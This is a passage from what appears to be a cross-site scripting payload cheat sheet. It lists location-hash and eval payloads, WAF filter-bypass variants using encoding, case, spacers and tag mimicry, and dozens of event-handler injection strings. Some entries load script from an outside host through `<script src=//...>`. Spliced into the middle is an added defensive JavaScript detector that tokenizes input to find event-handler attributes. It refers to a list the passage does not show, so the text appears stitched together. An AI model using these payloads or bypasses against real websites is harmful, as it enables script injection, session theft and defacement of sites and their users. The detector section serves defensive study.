Result => javascript: +'click me! + #'-alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>'click me!</javascript:>#'-alert(1)
javascript + :'click me! + #'-alert(1)
javascrip + t:'click me! + #'-alert(1)
javas + cript:'click me! + #'-alert(1)
Location Based Payloads – Part I
<svg/onload=location='javascript:alert(1)'>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
Result => javascript:alert(1)
<svg/onload=location='javas'%2B'cript:'%2B
'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
Result => javas + cript: + ale + rt + (1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
Result => javas + cript: + ale + rt + (1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
Result => javas + cript: + ale + rt + ( + 1 + )

Filter Bypass Procedure

#XSS vs WAF

1) use <x & jump to event handler

2) use onxxx=yyy & find number of x it accepts

3) test them & change tag accordingly

4) put js

— Brute (@brutelogic) October 10, 2015

<x onxxx=1

Example:
<x onxxx=1     -> pass
<x onxxxx=1   -> pass
<x onxxxxx=1 -> block

Event handlers with up to 6 chars:
oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow

1) Encoding

<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1

2) Mixed Case

<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1

3) Doubling

<x onxxx=1 onxxx=1

4) Spacers

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1

5) Quotes

<x 1='1'onxxx=1
<x 1="1"onxxx=1

6) Mimetism

<x </onxxx=1 (mimics a closing tag)
<x 1=">" onxxx=1 (mimics a text outside of the tag)
<http://onxxx%3D1/ (mimics an URL)

7) Combo

<x%2F1=">%22OnXxx%3D1
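
Every variant in the two filter-bypass catalogues above (the Encoding, Mixed Case, Doubling, Spacers, Quotes, Mimetism and Combo entries here and in the earlier "Filter Bypass Generic Tag + Handler" list) defeats a filter that looks for the literal text "<tag onxxx=". What survives all of them is what the browser's own tokenizer sees, so a detector has to normalise the same way. The following is an added example, not code from the original page: a simplified start-tag tokenizer, percent-decoding applied up to twice so that double-encoded input such as %253C is seen as "<", and a check that reports every attribute whose name starts with "on". It assumes the input is a raw query-string value; function names and the sample inputs are assumptions of this example, and it goes beyond the page by handling double encoding as well as single.

```javascript
// Added example (not from the original page): see an obfuscated start tag the
// way an HTML parser does, then report event-handler attributes.

// Percent-decode up to `rounds` times so that %253C is seen as "<";
// malformed sequences are left alone instead of throwing.
function percentDecode(s, rounds = 2) {
  let out = String(s);
  for (let i = 0; i < rounds; i++) {
    const next = out.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
    if (next === out) break;
    out = next;
  }
  return out;
}

// Attribute separators per the HTML tokenizer: tab, LF, FF, CR, space and "/"
// (the self-closing-start state falls back to before-attribute-name).
const SEP = /[\t\n\f\r \/]/;

// Parse every start tag in `html`: [{tag, attrs: [{name, value}]}].
// Names are lower-cased; a quoted value is read to its matching quote, so
// ">" inside quotes does not end the tag; an unquoted value ends at
// whitespace or ">", so "1/" stays a value.
function startTags(html) {
  const tags = [];
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    i++;
    if (!/[a-z]/i.test(html[i] || '')) continue; // "<" + non-letter is text or an end tag
    let tag = '';
    while (i < html.length && !SEP.test(html[i]) && html[i] !== '>') tag += html[i++];
    const attrs = [];
    while (i < html.length && html[i] !== '>') {
      while (i < html.length && SEP.test(html[i])) i++;            // before attribute name
      if (i >= html.length || html[i] === '>') break;
      let name = '';
      while (i < html.length && !SEP.test(html[i]) && html[i] !== '=' && html[i] !== '>') name += html[i++];
      while (i < html.length && SEP.test(html[i])) i++;            // after attribute name
      let value = null;
      if (html[i] === '=') {
        i++;
        while (i < html.length && SEP.test(html[i])) i++;          // before attribute value
        const q = html[i];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, i + 1);
          value = html.slice(i + 1, end === -1 ? html.length : end);
          i = end === -1 ? html.length : end + 1;
        } else {
          value = '';
          while (i < html.length && !/[\t\n\f\r >]/.test(html[i])) value += html[i++];
        }
      }
      if (name) attrs.push({ name: name.toLowerCase(), value });
    }
    tags.push({ tag: tag.toLowerCase(), attrs });
    if (html[i] === '>') i++;
  }
  return tags;
}

// Detection: decode, tokenize, and list every attribute named on<letters>.
function findEventHandlers(raw) {
  const found = [];
  for (const t of startTags(percentDecode(raw))) {
    for (const a of t.attrs) {
      if (/^on[a-z]+$/.test(a.name)) found.push({ tag: t.tag, handler: a.name, value: a.value });
    }
  }
  return found;
}
```

The Combo entry `<x%2F1=">%22OnXxx%3D1` decodes to `<x/1=">"OnXxx=1` and tokenizes to tag x with attributes 1 and onxxx, exactly as a browser would read it; the URL-mimicking `<http://onxxx%3D1/` yields tag "http:" with attribute onxxx, and an ordinary `<a href="...?onload=1">` yields no handler at all because onload sits inside a quoted value. Matching on the tokenized attribute list rather than on the raw text is what makes the six obfuscation classes collapse into one check.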

Existing Code Reuse

<script>alert(1)//
<script>alert(1)<!--

1) Before injection:

<input type="text" value=""><script type="text/javascript"> function x(){ do something }</script>

2) After injection:

<input type="text" value=""><script>alert(1)//"><script type="text/javascript"> function x(){ do something }</script>
<script src=//brutelogic.com.br/1>
<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA

XSS Payload Scheme

<tag handler=code>
<b onclick=alert(1)>click me!
<img src=x onerror=alert(1)>
<frameset><frame src onload=alert(1)>
extra1 <tag extra2 handler=code> extra3
extra1 <tag handler=code extra2> extra3
<svg/onload=alert(1)>
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
<img src=1.png onload=alert(7)>
<style onload=alert(8)>
<input src=1.png type="image" onload=alert(3)>
<script src=0.js onerror=alert(1)></script>
<script src=1.js onload=alert(5)></script>
<listing><img src=x onerror=alert(32)></listing>

<img onerror=MsgBox+9 language=vbs src=a>
<img onerror=MsgBox+8 language=vbscript src=a>

====
<svg[0X09]onload=alert()>
<svg[0X0A]onload=alert()>
<svg[0X0C]onload=alert()>
<svg[0X0D]onload=alert()>
<svg[0X20]onload=alert()>
<svg[0X2F]onload=alert()>
====

<meta http-equiv="content-type" content="text/html;charset=utf-7"> +ADw-script+AD4-alert(123); +ADw-/script+AD4-

<svg/onload=eval(location.hash.slice(1))>
<svg/onload=eval(location.hash.substr(1))>
<svg/onload=eval(location.hash.split('#')[1])>
<svg><g onload=alert(55)>
<svg onload=alert(54)>

<image src=1 onerror=alert(53)>
<b/ondrag=alert()>x
<audio src=x onerror=alert(51)>

<frameset onload=alert(40)>
<select onfocus=alert(36) autofocus>
<textarea onfocus=alert(37) autofocus>
<keygen onfocus=alert(38) autofocus>
<input onfocus=alert(33) autofocus>

<iframe/onload=alert(document.domain)></iframe>

<body/onload=alert(25)>
<img src=x onerror=alert(24)>
<a onclick=alert(18)>M
<a onmouseover=alert(17)>M

===DOM===
<input onclick="document.write('<img src=x onerror=alert(1)>');">

That's about all of them.